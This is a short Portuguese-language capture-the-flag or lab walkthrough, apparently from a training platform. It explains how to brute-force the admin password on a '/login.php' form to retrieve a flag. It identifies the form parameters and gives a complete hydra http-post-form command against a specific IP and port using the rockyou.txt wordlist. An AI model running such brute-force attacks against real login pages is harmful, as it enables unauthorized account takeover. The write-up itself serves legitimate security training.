Question-1

Usando o que você aprendeu nesta seção, tente atacar a página '/login.php' para identificar a senha do usuário 'admin'. Depois de fazer login, você deverá encontrar uma bandeira. Envie a bandeira como resposta.

• Formulário de login

• Encontrar os paramêtros do formulário de login

• Em seguida vamos procurar por parametros que compõem o login

username=admin&password=admin

• Para usar em um hydra http-post-form, podemos tomá-lo como está e substituir o nome de usuário/senha que usamos admin:adminpor ^USER^e ^PASS^. A especificação do nosso caminho de destino final deve ser a seguinte:

"/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

• Pyload :

hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 94.237.59.199 -s 56528 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

• Fazer o login com as credenciais encontradas e achar a flag